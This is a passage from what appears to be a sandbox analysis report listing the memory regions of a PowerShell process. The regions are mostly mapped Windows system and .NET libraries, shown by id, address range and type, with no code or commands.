"c:\\windows\\system32\\locale.nls") Region: id = 3261 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3262 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3263 start_va = 0x510000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3264 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3265 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 3266 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3267 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3268 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3269 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3270 start_va = 0x7fffc6890000 end_va = 0x7fffc68acfff monitored = 0 entry_point = 0x7fffc6891de0 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 3271 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3272 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3273 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 3274 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3275 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 3276 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3277 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3278 start_va = 0x7fffae2a0000 end_va = 0x7fffae304fff monitored = 1 entry_point = 0x7fffae2cbd50 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 3279 start_va = 0x610000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3280 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3281 start_va = 0x1e0000 end_va = 0x1e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3282 start_va = 0x480000 end_va = 0x4adfff monitored = 0 entry_point = 0x4814d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3283 start_va = 0x700000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 3284 start_va = 0x7fffcb940000 end_va = 0x7fffcb96ffff monitored = 0 entry_point = 0x7fffcb9414d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3285 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 3286 start_va = 0xa90000 end_va = 0x1e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 3287 start_va = 0x1f0000 end_va = 0x1f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 3288 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 3289 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 3290 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 3291 start_va = 0x1ea0000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 3292 start_va = 0x4b0000 end_va = 0x4b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 3293 start_va = 0x7fffabe90000 end_va = 0x7fffabf38fff monitored = 1 entry_point = 0x7fffabe98150 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 3294 start_va = 0x7fffcb970000 end_va = 0x7fffcb9c4fff monitored = 0 entry_point = 0x7fffcb97a7e0 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3295 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3296 start_va = 0x7fffb4400000 end_va = 0x7fffb4409fff monitored = 0 entry_point = 0x7fffb4401390 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3297 start_va = 0x7fffa7500000 end_va = 0x7fffa7fc6fff monitored = 1 entry_point = 0x7fffa75063c0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 3298 start_va = 0x7fffbb230000 end_va = 0x7fffbb245fff monitored = 0 entry_point = 0x7fffbb23c000 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\System32\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\system32\\vcruntime140_clr0400.dll") Region: id = 3299 start_va = 0x7fffabdd0000 end_va = 0x7fffabe8cfff monitored = 0 entry_point = 0x7fffabe57db0 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\System32\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\system32\\ucrtbase_clr0400.dll") Region: id = 3300 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 3301 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3302 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3303 start_va = 0x7fff47eb0000 end_va = 0x7fff47ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47eb0000" filename = "" Region: id = 3304 start_va = 0x7fff47ec0000 end_va = 0x7fff47ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47ec0000" filename = "" Region: id = 3305 start_va = 0x7fff47ed0000 end_va = 0x7fff47f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47ed0000" filename = "" Region: id = 3306 start_va = 0x7fff47f60000 end_va = 0x7fff47fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47f60000" filename = "" Region: id = 3307 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3308 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3309 start_va = 0x610000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3310 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 3311 start_va = 0x610000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3312 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 3313 start_va = 0x1ea0000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 3314 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 3315 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3316 start_va = 0x640000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3317 start_va = 0x1fa0000 end_va = 0x19f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 3318 start_va = 0x1f20000 end_va = 0x1f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 3319 start_va = 0x19fa0000 end_va = 0x1a0a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000019fa0000" filename = "" Region: id = 3320 start_va = 0x1a0b0000 end_va = 0x1a12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a0b0000" filename = "" Region: id = 3321 start_va = 0x1a130000 end_va = 0x1a467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3322 start_va = 0x7fffa5f00000 end_va = 0x7fffa74fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\de013c985ad100d05dc94ec118f77b92\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\de013c985ad100d05dc94ec118f77b92\\mscorlib.ni.dll") Region: id = 3323 start_va = 0x7ff4fddf0000 end_va = 0x7ff4fde8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fddf0000" filename = "" Region: id = 3324 start_va = 0x7ff4fdde0000 end_va = 0x7ff4fddeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdde0000" filename = "" Region: id = 3325 start_va = 0x7fff47fd0000 end_va = 0x7fff4804ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47fd0000" filename = "" Region: id = 3326 start_va = 0x1a470000 end_va = 0x1a5b4fff monitored = 0 entry_point = 0x1a4ca9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3327 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3328 start_va = 0x610000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3329 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3330 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3331 start_va = 0x7fff48050000 end_va = 0x7fff4805ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48050000" filename = "" Region: id = 3332 start_va = 0x7fffa5280000 end_va = 0x7fffa5ef0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\808887ebadf1a37835b907c866cede3c\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\808887ebadf1a37835b907c866cede3c\\system.ni.dll") Region: id = 3333 start_va = 0x7fffa4800000 end_va = 0x7fffa5274fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\bd42a6d2da6a5a79a9f5db3fa08a5283\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.core\\bd42a6d2da6a5a79a9f5db3fa08a5283\\system.core.ni.dll") Region: id = 3334 start_va = 0x7fffc34a0000 end_va = 0x7fffc3548fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\bbaafa5e9b08bf0595cf4aeb6817258d\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.pb378ec07#\\bbaafa5e9b08bf0595cf4aeb6817258d\\microsoft.powershell.consolehost.ni.dll") Region: id = 3335 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3336 start_va = 0x7fffc9230000 end_va = 0x7fffc9263fff monitored = 0 entry_point = 0x7fffc9236e70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3337 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3338 start_va = 0x7fffc9a90000 end_va = 0x7fffc9a9bfff monitored = 0 entry_point = 0x7fffc9a92200 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3339 start_va = 0x7fffa1230000 end_va = 0x7fffa3295fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\c8022b1ef74ee53741e939d60ba9b34e\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.manaa57fc8cc#\\c8022b1ef74ee53741e939d60ba9b34e\\system.management.automation.ni.dll") Region: id = 3340 start_va = 0x630000 end_va = 0x630fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 3341 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3342 start_va = 0x1a470000 end_va = 0x1a5b4fff monitored = 0 entry_point = 0x1a4ca9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3343 start_va = 0x1a470000 end_va = 0x1a4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 3344 start_va = 0x1a4f0000 end_va = 0x1a56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a4f0000" filename = "" Region: id = 3345 start_va = 0x1a570000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a570000" filename = "" Region: id = 3346 start_va = 0x690000 end_va = 0x6d6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 3347 start_va = 0x1a5f0000 end_va = 0x1a66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5f0000" filename = "" Region: id = 3348 start_va = 0x1a670000 end_va = 0x1a6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a670000" filename = "" Region: id = 3349 start_va = 0x650000 end_va = 0x654fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 3350 start_va = 0x660000 end_va = 0x66ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 3351 start_va = 0x7fffcb340000 end_va = 0x7fffcb347fff monitored = 0 entry_point = 0x7fffcb341110 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 3352 start_va = 0x7fffcc090000 end_va = 0x7fffcc7c0fff monitored = 0 entry_point = 0x7fffcc19e6e0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3353 start_va = 0x7fffc8320000 end_va = 0x7fffc8aa9fff monitored = 0 entry_point = 0x7fffc84dc050 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3354 start_va = 0x7fffc9b80000 end_va = 0x7fffc9baafff monitored = 0 entry_point = 0x7fffc9b82db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 3355 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3356 start_va = 0x670000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 3357 start_va = 0x7fffca500000 end_va = 0x7fffca55ffff monitored = 0 entry_point = 0x7fffca510380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3358 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3359 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3360 start_va = 0x6e0000 end_va = 0x6e7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 3361 start_va = 0x7fff48060000 end_va = 0x7fff4806ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48060000" filename = "" Region: id = 3362 start_va = 0x1a6b0000 end_va = 0x1a72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a6b0000" filename = "" Region: id = 3363 start_va = 0x1a730000 end_va = 0x1a7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a730000" filename = "" Region: id = 3364 start_va = 0x1a7b0000 end_va = 0x1a8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a7b0000" filename = "" Region: id = 3365 start_va = 0x1a8b0000 end_va = 0x1a911fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscorrc.dll") Region: id = 3366 start_va = 0x7fffc8ac0000 end_va = 0x7fffc8ae2fff monitored = 0 entry_point = 0x7fffc8ac3700 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3368 start_va = 0x6e0000 end_va = 0x6e9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 3369 start_va = 0x1a920000 end_va = 0x1a99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a920000" filename = "" Region: id = 3370 start_va = 0x1a9a0000 end_va = 0x1a9a7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 3371 start_va = 0x1a9a0000 end_va = 0x1a9a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "__psscriptpolicytest_gijgsppw.vg4.ps1" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gijgsppw.vg4.ps1" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\temp\\__psscriptpolicytest_gijgsppw.vg4.ps1") Region: id = 3372 start_va = 0x1a9b0000 end_va = 0x1a9d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-package0213~31bf3856ad364e35~amd64~~10.0.19041.117.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.117.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-package0213~31bf3856ad364e35~amd64~~10.0.19041.117.cat") Region: id = 3373 start_va = 0x7fffc3470000 end_va = 0x7fffc347bfff monitored = 0 entry_point = 0x7fffc34737c0 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\System32\\msisip.dll" (normalized: "c:\\windows\\system32\\msisip.dll") Region: id = 3374 start_va = 0x7fffcb9d0000 end_va = 0x7fffcba48fff monitored = 0 entry_point = 0x7fffcb9f28f0 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 3375 start_va = 0x1a9e0000 end_va = 0x1b9dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001a9e0000" filename = "" Region: id = 3376 start_va = 0x7fffb4460000 end_va = 0x7fffb4476fff monitored = 0 entry_point = 0x7fffb44681c0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 3377 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3378 start_va = 0x1b9e0000 end_va = 0x1b9e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "__psscriptpolicytest_gijgsppw.vg4.ps1" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gijgsppw.vg4.ps1" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\temp\\__psscriptpolicytest_gijgsppw.vg4.ps1") Region: id = 3379 start_va = 0x7fffca0b0000 end_va = 0x7fffca0cefff monitored = 0 entry_point = 0x7fffca0b8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3380 start_va = 0x7fffb4410000 end_va = 0x7fffb4453fff monitored = 0 entry_point = 0x7fffb442f4d0 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 3381 start_va = 0x7fffc3450000 end_va = 0x7fffc346dfff monitored = 0 entry_point = 0x7fffc3451ba0 region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\System32\\wshext.dll" (normalized: "c:\\windows\\system32\\wshext.dll") Region: id = 3382 start_va = 0x7fffbc820000 end_va = 0x7fffbc867fff monitored = 0 entry_point = 0x7fffbc822c80 region_type = mapped_file name = "appxsip.dll" filename = "\\Windows\\System32\\AppxSip.dll" (normalized: "c:\\windows\\system32\\appxsip.dll") Region: id = 3383 start_va = 0x7fffa1010000 end_va = 0x7fffa122afff monitored = 0 entry_point = 0x7fffa1071450 region_type = mapped_file name = "opcservices.dll" filename = "\\Windows\\System32\\OpcServices.dll" (normalized: "c:\\windows\\system32\\opcservices.dll") Region: id = 3384 start_va = 0x7fffc15c0000 end_va = 0x7fffc17acfff monitored = 0 entry_point = 0x7fffc163ea20 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 3385 start_va = 0x7fffc5ea0000 end_va = 0x7fffc5ed5fff monitored = 0 entry_point = 0x7fffc5eaf5a0 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 3386 start_va = 0x7fffc1960000 end_va = 0x7fffc1c0dfff monitored = 0 entry_point = 0x7fffc19969a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 3387 start_va = 0x1a9e0000 end_va = 0x1aadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9e0000" filename = "" Region: id = 3388 start_va = 0x7fffbc780000 end_va = 0x7fffbc81ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.ni.dll" filename = 